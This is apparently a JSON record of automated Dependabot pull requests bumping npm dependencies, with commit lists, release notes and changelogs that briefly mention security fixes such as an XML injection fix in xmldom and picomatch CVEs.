view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.2.7 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.2.7...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimatch` from 3.1.2 to 3.1.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/7bba97888a27a6162983056bcce2a6e28f668712\"\u003e\u003ccode\u003e7bba978\u003c/code\u003e\u003c/a\u003e 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/bd259425b2ca17b42897997f93e890314155522d\"\u003e\u003ccode\u003ebd25942\u003c/code\u003e\u003c/a\u003e docs: add warning about ReDoS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a9c27c75725474dbde57db2995b6281b267756d\"\u003e\u003ccode\u003e1a9c27c\u003c/code\u003e\u003c/a\u003e fix partial matching of globstar patterns\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a2e084af579731af66c221214e3ca8222c9bf23\"\u003e\u003ccode\u003e1a2e084\u003c/code\u003e\u003c/a\u003e 3.1.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/ae24656237c3d58067442f790ce17eff84463a47\"\u003e\u003ccode\u003eae24656\u003c/code\u003e\u003c/a\u003e update lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/b1003749228b2a79e1f237963a0d559ef7a0941e\"\u003e\u003ccode\u003eb100374\u003c/code\u003e\u003c/a\u003e limit recursion for **, improve perf considerably\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/26ffeaa091b9f660833e23f42e07165b33e85c13\"\u003e\u003ccode\u003e26ffeaa\u003c/code\u003e\u003c/a\u003e lockfile update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/9eca892a4e5dbb20534f9f30483b85cdeee6c2eb\"\u003e\u003ccode\u003e9eca892\u003c/code\u003e\u003c/a\u003e lock node version to 14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/00c323b188b704e5d4bc534ecec2268cfa70a32a\"\u003e\u003ccode\u003e00c323b\u003c/code\u003e\u003c/a\u003e 3.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/30486b2048929264f44d18822891cfffa02af78b\"\u003e\u003ccode\u003e30486b2\u003c/code\u003e\u003c/a\u003e update CI matrix and actions\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/minimatch/compare/v3.1.2...v3.1.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/gwsbhqt\"\u003e\u003ccode\u003e@​gwsbhqt\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/81cba8d4b767cab3cb29d26eb4f691eed75b73b2\"\u003e\u003ccode\u003e81cba8d\u003c/code\u003e\u003c/a\u003e Publish 2.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/fc1f6b69006e9435caf8fb40d8aff378bc0b7bce\"\u003e\u003ccode\u003efc1f6b6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/eec17aee5428a7249e9ca5adbb8a0d28fa29619b\"\u003e\u003ccode\u003eeec17ae\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/78f8ca4362d9e66cadea97b93e292f10096452ed\"\u003e\u003ccode\u003e78f8ca4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/156\"\u003e#156\u003c/a\u003e from micromatch/backport-144\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/3f4f10eaa65bf3a52e8f2999674cd27e11fa3c9b\"\u003e\u003ccode\u003e3f4f10e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/144\"\u003e#144\u003c/a\u003e from Jason3S/jdent-object-properties\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/BenRogersWPG/update-issue-body/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/BenRogersWPG/update-issue-body/pull/10","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/BenRogersWPG%2Fupdate-issue-body/issues/10","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10/packages"}},{"old_version":"2.17.0","new_version":"11.4.4-cjs.2","update_type":"major","path":null,"pr_created_at":"2026-04-01T04:43:43.000Z","version_change":"2.17.0 → 11.4.4-cjs.2","issue":{"uuid":"4184031634","node_id":"PR_kwDOJkwVw87PI3BE","number":14,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 36 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-07T04:59:06.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-01T04:43:43.000Z","updated_at":"2026-04-07T04:59:07.000Z","time_to_close":519323,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":36,"packages":[{"name":"@xmldom/xmldom","old_version":"0.8.7","new_version":"0.8.12","repository_url":"https://github.com/xmldom/xmldom"},{"name":"fast-xml-parser","old_version":"4.2.2","new_version":"5.5.9","repository_url":"https://github.com/NaturalIntelligence/fast-xml-parser"},{"name":"glob","old_version":"10.2.3","new_version":"10.5.0","repository_url":"https://github.com/isaacs/node-glob"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"jsonpath","old_version":"1.1.1","new_version":"1.3.0","repository_url":"https://github.com/dchester/jsonpath"},{"name":"path-to-regexp","old_version":"6.2.1","new_version":"6.3.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"path-to-regexp","old_version":"1.8.0","new_version":"1.9.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"express","old_version":"4.18.2","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"form-data","old_version":"4.0.0","new_version":"4.0.4","repository_url":"https://github.com/form-data/form-data"},{"name":"gatsby","old_version":"4.23.1","new_version":"4.25.9","repository_url":"https://github.com/gatsbyjs/gatsby"},{"name":"@babel/runtime-corejs3","old_version":"7.13.9","new_version":"7.29.2","repository_url":"https://github.com/babel/babel"},{"name":"@babel/traverse","old_version":"7.21.5","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.17.0","new_version":"11.4.4-cjs.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"brace-expansion","old_version":"1.1.8","new_version":"1.1.13","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"flatted","old_version":"3.2.2","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"follow-redirects","old_version":"1.15.2","new_version":"1.15.11","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"socket.io-parser","old_version":"3.3.3","new_version":"3.3.5","repository_url":"https://github.com/socketio/socket.io"},{"name":"get-func-name","old_version":"2.0.0","new_version":"2.0.2","repository_url":"https://github.com/chaijs/get-func-name"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"jws","old_version":"3.2.2","new_version":"3.2.3","repository_url":"https://github.com/brianloveswords/node-jws"},{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"postcss","old_version":"8.3.11","new_version":"8.5.8","repository_url":"https://github.com/postcss/postcss"},{"name":"sharp","old_version":"0.30.7","new_version":"0.32.6","repository_url":"https://github.com/lovell/sharp"},{"name":"svgo","old_version":"2.8.0","new_version":"2.8.2","repository_url":"https://github.com/svg/svgo"},{"name":"word-wrap","old_version":"1.2.3","new_version":"1.2.5","repository_url":"https://github.com/jonschlinkert/word-wrap"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 26 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@xmldom/xmldom](https://github.com/xmldom/xmldom) | `0.8.7` | `0.8.12` |\n| [fast-xml-parser](https://github.com/NaturalIntelligence/fast-xml-parser) | `4.2.2` | `5.5.9` |\n| [glob](https://github.com/isaacs/node-glob) | `10.2.3` | `10.5.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [jsonpath](https://github.com/dchester/jsonpath) | `1.1.1` | `1.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `6.2.1` | `6.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `1.8.0` | `1.9.0` |\n| [express](https://github.com/expressjs/express) | `4.18.2` | `4.22.1` |\n| [form-data](https://github.com/form-data/form-data) | `4.0.0` | `4.0.4` |\n| [gatsby](https://github.com/gatsbyjs/gatsby) | `4.23.1` | `4.25.9` |\n| [@babel/runtime-corejs3](https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3) | `7.13.9` | `7.29.2` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.21.5` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.17.0` | `11.4.4-cjs.2` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.8` | `1.1.13` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.2` | `3.4.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.2` | `1.15.11` |\n| [socket.io-parser](https://github.com/socketio/socket.io) | `3.3.3` | `3.3.5` |\n| [get-func-name](https://github.com/chaijs/get-func-name) | `2.0.0` | `2.0.2` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [jws](https://github.com/brianloveswords/node-jws) | `3.2.2` | `3.2.3` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [postcss](https://github.com/postcss/postcss) | `8.3.11` | `8.5.8` |\n| [sharp](https://github.com/lovell/sharp) | `0.30.7` | `0.32.6` |\n| [svgo](https://github.com/svg/svgo) | `2.8.0` | `2.8.2` |\n| [word-wrap](https://github.com/jonschlinkert/word-wrap) | `1.2.3` | `1.2.5` |\n\nBumps the npm_and_yarn group with 1 update in the /.github/actions/close-bot directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\n\nUpdates `@xmldom/xmldom` from 0.8.7 to 0.8.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/releases\"\u003e\u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.8.12\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/discussions/357\"\u003ehttps://github.com/xmldom/xmldom/discussions/357\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.8.11\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.10...0.8.11\"\u003e0.8.11\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate \u003ccode\u003eownerDocument\u003c/code\u003e when moving nodes between documents \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/933\"\u003e\u003ccode\u003e[#933](https://github.com/xmldom/xmldom/issues/933)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/932\"\u003e\u003ccode\u003e[#932](https://github.com/xmldom/xmldom/issues/932)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/shunkica\"\u003e\u003ccode\u003e@​shunkica\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.10\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.9...0.8.10\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edom: prevent iteration over deleted items \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/514\"\u003e\u003ccode\u003e[#514](https://github.com/xmldom/xmldom/issues/514)\u003c/code\u003e\u003c/a\u003e/ \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/499\"\u003e\u003ccode\u003e[#499](https://github.com/xmldom/xmldom/issues/499)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/qtow\"\u003e\u003ccode\u003e@​qtow\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.9\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.8...0.8.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSet nodeName property in ProcessingInstruction \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/509\"\u003e\u003ccode\u003e[#509](https://github.com/xmldom/xmldom/issues/509)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/505\"\u003e\u003ccode\u003e[#505](https://github.com/xmldom/xmldom/issues/505)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/cjbarth\"\u003e\u003ccode\u003e@​cjbarth\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.8\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.7...0.8.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/blob/master/CHANGELOG.md\"\u003e\u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003e0.8.12\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca 